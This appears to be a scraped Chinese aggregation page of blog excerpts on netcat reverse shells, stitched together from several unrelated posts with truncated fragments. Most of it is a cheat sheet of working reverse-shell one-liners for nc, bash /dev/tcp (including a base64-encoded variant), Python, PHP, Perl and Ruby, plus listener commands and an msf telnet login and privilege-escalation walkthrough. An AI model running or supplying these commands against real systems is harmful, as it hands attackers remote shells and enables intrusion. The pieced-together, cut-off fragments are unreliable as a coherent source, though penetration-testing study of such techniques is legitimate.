精华内容
下载资源
问答
  • nc反弹shell

    2019-09-18 22:44:02
    nc反弹shell的几种方式 原理介绍 就拿我们经常访问的网页来说,一般情况下比如网站的Web服务是在80端口,那么我们每次访问网站其实就是和网站的服务器通过80端口来建立连接,从而传输数据。反弹shell就是要我们的vps...

    nc反弹shell的几种方式

    原理介绍
    就拿我们经常访问的网页来说,一般情况下比如网站的Web服务是在80端口,那么我们每次访问网站其实就是和网站的服务器通过80端口来建立连接,从而传输数据。反弹shell就是要我们的vps服务器设置监听,然后让服务器反弹一个shell来连接我们自己的主机,从而使我们能远程控制我们的主机,接下来我们来看看怎么建立连接和传输数据吧。
    方法一:
    服务端操作

    nc -e 指定的shell 反弹shell的ip 反弹shell的端口
    nc -e /bin/bash 192.168.1.10 6666
    

    客户端操作

    nc -lvp 6666
    nc -l 6666(mac端命令)
    

    方法二:
    服务端操作

    这段代码是借鉴的别人的,原理很简单
    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.1.10',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    

    客户端操作

    nc -lvp 6666
    nc -l 6666(mac端命令)
    

    方法三:
    后续补充。。。。。。

    展开全文
  • nc 反弹shell

    2020-04-27 23:30:26
    nc反弹shell 目标是操作机 在命令行操作 靶机 正向反弹和反向的区别: 正向 :操作机 连接 靶机 反向 :靶机连接操作机 正向反弹: 靶机: windows: nc -lvp 7777 -e cmd.exe linux: nc -lvp 7777 -e /bin/bash ...

    nc反弹shell

    目标是操作机 在命令行操作 靶机
    

    正向反弹和反向的区别:

    正向 :操作机 连接 靶机
    反向 :靶机连接操作机
    

    正向反弹:

    靶机:

    windows:    nc -lvp 7777 -e cmd.exe
    linux:      nc -lvp 7777 -e /bin/bash
    

    操作机:

    windows:  nc <靶机ip> 7777
    linux :   nc <靶机ip> 7777
    

    在操作机查看:反弹成功
    在这里插入图片描述

    反向反弹:

    操作机:

    windows:   nc -lvp 7777
    linux:     nc -lvp 7777
    

    靶机:

    windows:    nc -e cmd.exe <操作机ip> 7777
    linux:      nc -e /bin/bash <操作机ip> 7777
    

    多种反弹姿势 资料:
    https://www.cnblogs.com/-chenxs/p/11748488.html
    https://blog.csdn.net/csacs/article/details/91440568
    https://www.jianshu.com/p/5b73a607e2ea

    展开全文
  • NC反弹Shell

    2019-11-23 11:37:15
    NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以...

    NC反弹Shell

    实验环境

    • Kali
    • Ubuntu(开启telnet)

    一、Msf登录设置

    1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet)

    使用telnet登录模块
    在这里插入图片描述
    设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行
    在这里插入图片描述
    可以看到,成功登录telnet,记录会话
    在这里插入图片描述
    选择第一个会话进行连接
    在这里插入图片描述
    然后下载事先准备好的文件123.c(kali http服务上)
    在这里插入图片描述
    然后我们请求kali上的123.c这个文件到Ubuntu
    在这里插入图片描述
    在Ubuntu上,用gcc编译成执行文件
    在这里插入图片描述
    好了,执行文件准备好后,还需创建一个bash脚本文件,在tmp里创建个文件写入如下两行,设置kali的ip和kal监听的端口
    在这里插入图片描述
    我们新开一个端口,开启nc监听
    在这里插入图片描述
    回到msf上,ps -edf |grep udev找到udev root的进程号
    在这里插入图片描述
    然后./456 加进程号-1 执行
    在这里插入图片描述
    回到kali nc,输入ls返回了Ubuntu的根目录文件。反弹shell成功。
    在这里插入图片描述

    ——————————————————————

    期间遇到许多问题,文章可能不太严谨,经供参考。

    展开全文
  • 主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
  • Windows/Linux 下nc 反弹shell

    万次阅读 2019-06-11 15:26:56
    *Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用...

    Windows/Linux 下nc 反弹shell

     高二那年班主任对我们说:其实我并不反对你们谈恋爱,
    	                 只是你们记得要找一个有担当的,
    	                     那些一看见老师就松开你手的,要来有什么用?
    

    NC概述:

    • nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。
    • 何为反弹shell?为什么不反弹攻击?
      相信你有一天可以直接把所有攻击反弹回去的.

    常用命令

    banner获取

    nc -nv ip port
    

    连接远程主机

    nc -nvv ip port
    

    端口扫描

    nc -v ip port            //指定端口
    nc -v -z  ip 1-1555         //指定端口段
    

    文件传输

    nc  -lvp  8888 < test.txt  服务端
    nc -nv 服务端ip 8888 > test.txt 客户端
    

    获取shell

    正向shell:客户端想要获取服务器shell

    	客户端监听
    nc -lvp 8888 -e /bin/sh 
    nc -lvp 8888 -e c:\windows\system32\cmd.exe 
    	服务端反弹
    	nc 服务端ip 8888
    

    反向shell:服务端想要获取客户端器shell

    客户端监听
    nc -lvp 8888 
    服务端反弹
    nc ip 8888 -e /bin/sh 
    nc ip 8888 -e c:\windows\system32\cmd.exe 
    

    没有nc是,由于各种环境不同,可以结合天时地利人和。

    • Bash
    bash -i >& /dev/tcp/ip/port 0>&1
    base64版 
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzUvNzg5MCAwPiYx|{base64,-d}|{bash,-i}'
    
    • python
    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    
    • php
    php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'
    
    • perl
    Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    
    • ruby
    ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    
    • nc反弹nc
    nc -e /bin/bash ip port
    

    成功反弹shll
    在这里插入图片描述

    余生很长,请多指教。
    在这里插入图片描述

    展开全文
  • web渗透【12】nc 反弹shell
  • 假如ubuntu、CentOS为...正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
  • 今日中午有某牛牛问我如何使用NC反弹拿shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下...此时,可以同样采用Windows下的经典的NC反弹Shell方法。在Windows下反弹CmdShell时,首先...
  • 利用nc反弹shell

    2020-05-18 17:08:43
    攻击机主动连接并得到反弹shell nc 靶机ip 53##因为防火墙的原因,通常不会成功 服务端监听连接 nc -lp 53 -e /bin/sh ##-lp就是-l,-p写在一起 nc -lp 53 -e c:\windows\system32\cmd.exe ##windows 反向shell...
  • 利用nc反弹shell实验

    2020-03-19 17:08:45
    反弹shell 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与...
  • 本机开启监听:nc -lvnp 4444nc -vvlp 4444目标机器开启反弹bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1perl版本:perl -e 'use socket;$i="10.0.0.1";$p=1234;socket(s,pf_inet,sock_stream,...
  • badusb_nc反弹shell

    千次阅读 2016-01-13 19:08:19
    badusb nc arduino shell
  • 记一次nc反弹shell

    2020-11-30 18:44:44
    在kali虚拟机上用nc监听端口7777 nc -lvp 7777 在ubuntu虚拟机上用python脚本去反向连接 python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('?.?.?.?',7777...
  • 使用nc反弹shell方法

    千次阅读 2017-05-08 16:20:58
    hacker机:192.168.1.1 目标机:192.168.1.2 1、在hacker机执行 nc -vlp 9999 (监听本机9999端口) 2、在目标机执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1 成功反弹shell
  • 内网渗透:nc反弹shell总结

    千次阅读 2021-01-03 11:17:26
    2、若靶机上存在nc,获取反向shell: vps攻击机:nc -lvp 9999 // 监听9999端口 靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,132
精华内容 1,652
关键字:

nc反弹shell